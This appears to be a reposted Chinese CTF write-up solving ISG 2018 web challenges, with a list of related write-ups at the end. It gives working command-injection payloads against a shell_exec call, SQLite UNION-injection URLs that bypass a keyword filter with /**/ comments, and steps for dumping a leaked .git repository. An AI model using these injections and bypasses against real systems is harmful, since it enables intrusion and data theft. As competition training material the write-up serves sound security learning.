ISG 2018 Web Writeup

文章目录

又一次感觉到了,作为一个CTFer,要想在比赛中有高的输出,只做Web是不够的

calc

首先看到题目后,在输入框中测试了一下,发现可以被执行

首先猜想是不是ssti,模板注入,但是平常遇到的模板注入题目中,python的居多,php的没怎么遇到过,有点怀疑如果是php的模板注入的话也不一定能搞得出来,这个时候扫一下目录

1
python dirsearch.py -u http://202.120.7.205:60003/ -e php -t 60

发现存在git源码泄露

直接上githack看看能够拖下来什么东西

1
python2 GitHack.py -u "http://202.120.7.205:60003/.git/"

index.php下载了下载

开启代码审计模式

第22~27行对GET方法是否被使用做了一次判断

123456
$str="";if(!empty($_GET)){    $str=$_GET["calc"];}?>

第40~42行对变量$str是否为空做了一次判断

1234
if($str !== ""){}?>

接下来到第44~46行这里,看到使用了shell_exec函数,基本可以判断为命令注入了

123
    echo $str." = ".shell_exec("echo "$str" | bc");?>

接下来开始绕过

测试的话可以把shell_exec里面的内容粘贴到linux 的bash中进行测试

1
echo "$str" | bc

可以看到"转义字符输出"

1
echo "$str" | bc

$str函数是我们可以控制的值

开始绕过之旅

|在命令执行漏洞中经常用到,表示管道,上一条命令的输出,作为下一条命令参数

所以,会把echo 后的内容传值到bc命令,但是经过测试发现bc命令是不存在的,所以用linux 中的注释符#

注释掉它,基本构造如下

1
echo "$str#" | bc

这样来说,可以注释掉后面的bc命令了,但是因为有"的阻碍,使我们没法达到目的,所以闭合掉双引号,再加上管道符

构造如下

1
echo ""|$str#" | bc

$str替换为ls命令,本地验证通过

构造payload,列一下题目的当前目录

1
"| ls #

发现flag文件there_1s_4_fl4g

构造payload读取

1
"| cat there_1s_4_fl4g #

secret

题目打开之后有弹窗

随便输入后,提示密码错误,右击查看源代码

发现第6~16行中包含了密码和要输出的内容

1234567891011
<script type="text/javascript">    a = prompt("Password");    if(a=="H4CK3D")    {        alert("Flag is '"+atob("WW91IGFyZSBUcmFwcGVkIDopIFRoaXMgaXMgbm90IHRoZSBmbGFnLiBDaGVjayBhcm91bmQu")+"'");    }    else    {        alert("Wrong Password!");    }</script>

其中prompt方法用于显示可提示用户进行输入的对话框

atob函数是javascript中用于解密base64编码的方法,直接解密字符串

123
>>> import base64>>> base64.b64decode("WW91IGFyZSBUcmFwcGVkIDopIFRoaXMgaXMgbm90IHRoZSBmbGFnLiBDaGVjayBhcm91bmQu")b'You are Trapped :) This is not the flag. Check around.'

发现并没有flag

提示让我们去周围找一找

访问index.html页面,发现进行了302跳转到了trap.html页面

我们直接查看index.html页面的源码

发现其6~8行进行了一次302跳转

直接看下面的代码

在45~55行中发现类似的前一个页面的代码

1234567891011
<script type="text/javascript">    a = prompt("Password");    if(a=="H4CK3D")    {        alert("Flag is "+atob("ZmxhZzpJU0d7SDNJSU9fMXNHX2pzX1RyNHB9"));    }    else    {        alert("Wrong Password!");    }</script>

直接解密得到flag

123
>>> import base64>>> base64.b64decode("ZmxhZzpJU0d7SDNJSU9fMXNHX2pzX1RyNHB9")b'flag:ISG{H3IIO_1sG_js_Tr4p}'

news

这个题考察了sqlite的注入,进行了简单的危险函数判断

这里刚开始普及一些sqllite知识

sqllite基础

sqllite数据库注入和mysql数据库注入很像,不同点在于,sqllite数据库没有information_schema数据库,而是采用sqlite_master表,来存储当前数据库中所有表的相关信息,比如表的名称、用于创建此表的sql语句、索引、索引所属的表、创建索引的sql语句等。它的字段有

1
type,name,tbl_name,rootpage,sql

type为类型

1.查询表信息

如果要查询表的信息,则type字段为“table”,name字段为表的名称,返回结果中返回的sql字段,为创建此表的sql语句。

1
select * from sqlite_master where type=’table’ and name=‘表名’;

2.查询索引信息

如果要查询索引信息,则type字段为“index”,name字段为索引名称,返回结果中的tbl_name字段为该索引所属的表,sql字段为创建此索引的sql语句。

1
select * from sqlite_master where type=’index’ and name=‘索引名’;

sql为创建数据表的语句,这个对我们非常有用

name 对于表来说,是当前表的名字,对于索引来说是当前索引的名称

tbl_name是该索引所属的表的名字

rootpage 根据字面意思理解,应该是这个对象在数据库文件中的第一个页面位置。类似链表的一个指针

手工注入

首先去看它的codesafe函数这里判断了什么内容

在代码的第47~51行

12345
def (n):    if re.search("select", n) or re.search(" ", n) or re.search("where", n) or re.search("=", n) or re.search("'", n):        return False    else:        return True

可以看到,当其中有select、空格、where='时,返回False

会触发第73~74行这里进行截断返回

12
if not codesafe(id):            return 'Hacker?'

了解请了这些后,开始注入

首先,判断空格可以通过/**/,来进行绕过,判断select可以采用大小写来绕过

where=可以不用

这里采用了伪静态的模式,后面拼接.html可能是web.py框架里面内置判断,不拼接.html会显示404页面

开始注入

判断字段数为2

1
http://202.120.7.206:60019/news-1/**/order/**/by/**/2.html

判断显示位

1
http://202.120.7.206:60019/news-4/**/union/**/Select/**/1,2.html

查看建表的sql语句,可以直接获取字段和表名

1
http://202.120.7.206:60019/news-4/**/union/**/Select/**/sql,2/**/from/**/sqlite_master.html

直接查看flag

1
http://202.120.7.206:60019/news-4/**/union/**/Select/**/flag,2/**/from/**/flag.html

原文:大专栏  ISG 2018 Web Writeup

原文地址:https://www.cnblogs.com/chinatrump/p/11584506.html

时间: 2024-11-09 03:35:10

ISG 2018 Web Writeup的相关文章

2017 redhat web writeup

2017 RedHat Web writeup1.thinkseeker2.PHPMyWIND3.后台 2017 RedHat Web writeup 1.thinkseeker 这题考两个点 1.用with rollup过前面两个if 2.用盲注找到flag 关于第一点在实验吧有原题:http://www.shiyanbar.com/ctf/1940 过滤方法稍有不同,用操作符代替关键字即可.token使用变量覆盖就可以. 第二点就是infoid这个参数有盲注,跑脚本可以拿到flag. 这是脚

ISCC 2017 Web writeup

ISCC 2017 Web writeupWeb签到题WelcomeToMySQL自相矛盾我们一起来日站I have a jpg,i upload a txt.where is your flagSimple sqli ISCC 2017 Web writeup Web签到题 这种签到题不能往难了想,首先理所当然的这样传参 hiddenflag=f1ag&flag=f1ag 这回显不一样了,试了很多方法,最后就是再加一个参数FLAG=f1ag,然后就成了,完全没有逻辑... WelcomeToM

[WUST-CTF]Web WriteUp

周末放假忙里偷闲打了两场比赛,其中一场就是武汉科技大学的WUST-CTF新生赛,虽说是新生赛,题目质量还是相当不错的.最后有幸拿了总排第5,记录一下Web的题解. checkin 进入题目询问题目作者昵称,在题面里可以看到是52HeRtz,但是发现题目输入框只能输入3个字符,并且按钮是灰色的 直接F12审查元素去掉maxlength以及disable两个属性,输入作者昵称即可 弹出作者的博客地址,跟进去 在作者博客首页可以看到一部分Flag: 根据提示“远古的博客”,找到一篇1970年的文章,文

NJCTF2017 Web Writeup

一个登陆和注册的功能,开始以为是注入,发现并不行.后来尝试了下弱口令 1 2 username:admin password:admin123 结果登录成功了..其实正解是注册时注册用户为admin后跟很多很多空格之后加个a就是注册时拼接到数据库时有长度限制一开始测试不成功是因为空格太少了,尴尬 Get Flag 看起来是一个搜索图片的框输入1.jpg后在返回页面查看源码,发现被base64加密过那么我直接读../../../../../../etc/passwd试试解base64发现确实可以读

MOCTF web writeup

前几天发现一个不错的平台MOCTF但一直没时间刷.这几天陆续更新web题的wp web1:一道水题 进去一堆青蛙 查看源代码,看到flag web2:还是水题 发现密码框输入不了,遂F12审查元素,删除disable属性,以及将长度改为5,输入moctf.得到flag web3:访问限制 题目提示用NAIVE浏览器,于是想到burp改user-agent:NAIVE run得到flag web4:机器蛇 这道题....我...一进去玩了半天的贪吃蛇.... 后来随手审查了元素,发现robots.

1008.CTF 题目之 WEB Writeup 通关大全 – 2

Web题目系列2 登陆一下好吗?? 题目链接 http://shiyanbar.com/ctf/1942 题目描述 不要怀疑,我已经过滤了一切,还再逼你注入,哈哈哈哈哈! flag格式:ctf{xxxx} 解题思路 一个万能密码问题,多试试就可以了. username: ''=' password: ''=' who are you? 题目链接 http://shiyanbar.com/ctf/1941 题目描述 我要把攻击我的人都记录db中去! 解题思路 看到题目就想到修改x-forwarde

1009.CTF 题目之 WEB Writeup 通关大全 – 3

Web题目系列3 让我进去 题目链接 http://shiyanbar.com/ctf/1848 题目描述 相信你一定能拿到想要的 Hint:你可能希望知道服务器端发生了什么.. 格式:CTF{} 解题思路 用burpsuite抓包后,发现cookie里有一个字段source=0,修改为1后获取源码. 源码内容 <html> <body> <pre> $flag = "XXXXXXXXXXXXXXXXXXXXXXX"; $secret = "

1010.CTF 题目之 WEB Writeup 通关大全 – 4

Web题目系列4 上传绕过 题目链接 http://shiyanbar.com/ctf/1781 题目描述 bypass the upload 格式:flag{} 解题思路 随意上传文件,发现提示只能上传图片文件,上传图片后,看到发送包的内容为 推测最后保存文件的名称为dir + filename,所以使用00截断来构造绕过php不能上传的问题. flag{SimCTF_huachuan} NSCTF web200 题目链接 http://shiyanbar.com/ctf/1760 题目描述

buuctf web write-up

warm up (HCTF2018) 漏洞名称: phpmyadmin 4.8.1 远程文件包含漏洞(CVE-2018-12613) 查看源码,source.php,进去看到源码 <?php highlight_file(__FILE__); class emmm { public static function checkFile(&$page) { $whitelist = ["source"=>"source.php","hint